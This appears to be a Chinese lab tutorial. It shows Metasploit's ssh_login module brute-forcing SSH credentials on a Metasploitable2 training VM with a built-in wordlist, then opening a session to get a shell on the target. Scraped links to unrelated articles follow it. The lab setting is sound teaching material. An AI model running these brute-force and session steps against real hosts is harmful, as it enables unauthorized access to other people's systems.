前置条件

靶机:metasploitable2

靶机IP:192.168.88.137

初始密码是:msfadmin/msfadmin

kali安装的镜像为:kali-linux-2019.1a-amd64.iso

KaliIP为:192.168.88.132

使用Metasploit获取mysql登录密码

进入Metasploit的控制台执行命令:

msfconsole

查询ssh服务相关模块信息,选择如下模块:

use  auxiliary/scanner/ssh/ssh_login

查看ssh_login配置参数选项:

show options

设置远程服务RHOSTS参数值:

set RHOSTS 192.168.88.137

设置USERPASS_FILE参数,本文使用系统本身提供的:

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt

执行攻击命令:

exploit

上述操作截图如下:

退出攻击,CTRL+C,查看会话列表:sessions -l

进入指定会话:sessions -i 1,进入到会话1,执行shell命令如下截图:

上述操作时通过,ssh_login模块获取到靶机的ssh会话信息,通过会话可以操作靶机上的信息,删除创建文件等。

使用Kali上的Metasploit获取ssh登录到靶机权限相关推荐

  1. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  2. 天翼弹性云服务器的SSH登录与文件上传

    一,SSH登录 1.登录之前我们首先重置下登录密码,进入天翼云控制台选择弹性云主机,然后点击更多重置密码(记录下IPv4地址栏里面的公网地址). 2.密码重置完成之后就可以进行登录了,我这里用Moba ...

  3. Windows环境下通过SSH登录新浪云

    在后端系统开发中,开发完成之后,如果需要对外提供服务,需要部署到相应的对外公网服务器上.而作为个人开发者,或者测试用户,可以选用现在比较成熟的云,将代码托管,著名的有阿里云(需要备案),本文为了方便说 ...

  4. Springboot + Spring Security 实现前后端分离登录认证及权限控制

    Spring Security简介 Spring Security 是 Spring 家族中的一个安全管理框架,实际上,在 Spring Boot 出现之前,Spring Security 就已经发展 ...

  5. 如何设置 Linux 上 SSH 登录的 Email 提醒

    如何设置 Linux 上 SSH 登录的 Email 提醒 虚拟私有服务器 (VPS)上启用 SSH 服务使得该服务器暴露到互联网中,为黑客攻击提供了机会,尤其是当 VPS 还允许root 直接访问时 ...

  6. 教你如何在 Linux 上为 SSH 登录设置电子邮件提醒

    在本文中介绍如何在Linux系统上为ssh登录设置电子邮件提醒.以接收有关对root用户的未经授权或非法登录访问的警报. .bashrc文件是做什么的? .bashrc文件是一个脚本,每当以交互方式启 ...

  7. Debian8 Linux上安装SSH服务器并配置sshd_config文件启用root ssh登录

    Debian Linux上安装SSH服务器 安装SSH服务器debian Linux允许我们通过ssh协议登录debian服务器.SSH是从远程位置登录debian的首选方法,因为ssh协议通过Int ...

  8. ssh不能进入save方法_如何 SSH 登录到 Linux 上的特定目录

    你是否遇到过需要 SSH 登录到远程服务器并立即 cd 到一个目录来继续交互式作业?你找对地方了!这个简短的教程描述了如何直接 SSH 登录到远程 Linux 系统的特定目录.而且不仅是 SSH 登录 ...

  9. ssh登录极路由后台_使用SSH来远程使用服务器上的可视化软件

    Linux的SSH命令提供了相当强大的远程访问功能.用户可以使用SSH命令快速的访问其他Linux机器,比如计算机集群系统.今天我们就来了解一下SSH,以及如何使用SSH来远程使用服务器上的可视化软件 ...

最新文章

  1. 数据结构与算法—图论之dfs、bfs(深度优先搜索、宽度优先搜索)
  2. Java类类getGenericSuperclass()方法及示例
  3. Mac安装oracleVM VMware安装失败,解决方案
  4. 隐马尔科夫模型及Viterbi算法的应用
  5. ECC椭圆曲线加密算法原理 | 比特币加密算法
  6. 获取对象属性名的方法 Object.keys() 与 Object.getOwnPropertyNames() 与 for循环
  7. MATLAB官方机器学习入门教程
  8. SHFileOperation的用法
  9. 软件文档的概念和细分
  10. JS 字符串 常用方法(截取、替换、拼接)
  11. 抖音短连接v.douyin.com/xxx 怎么生成?
  12. 【Unity】XPS模型导入Unity(支持VRChat)
  13. Chrome浏览器ERR_INVALID_SIGNED_EXCHANGE解决方案
  14. Python读取EXCEL省份数据绘制地图
  15. mac mini u盘安装系统_用PE系统U盘启动盘安装操作系统
  16. MySQL建表,主键,外键
  17. 计算机基础公开课课件比赛,计算机基础公开课课件.ppt
  18. 百度:P2P网络宣传渠道将重构,审查后将出台“黑白名单”
  19. 2020 如何进入Vue 可视化项目管理器 UI界面
  20. 区块链文旅:旅游业的新革命

热门文章

  1. java入门基础(四)
  2. 【UNR #1】合唱队形
  3. Redis基本事务的操作
  4. [Transformer]CvT:Introducing Convolutions to Vision Transformers
  5. c语言printf使用方法,C/C++语言printf命令使用方法
  6. linux下Hiredis的安装和简单使用
  7. Spring Security系列教程-Spring Security核心API讲解
  8. 【vscode】调试cocos creator (Js 无法命中断点问题解决)
  9. 测试基础-静态白盒测试(检查代码)
  10. python批量删除文件前缀名_Python3-去除目录中相同的文件名前缀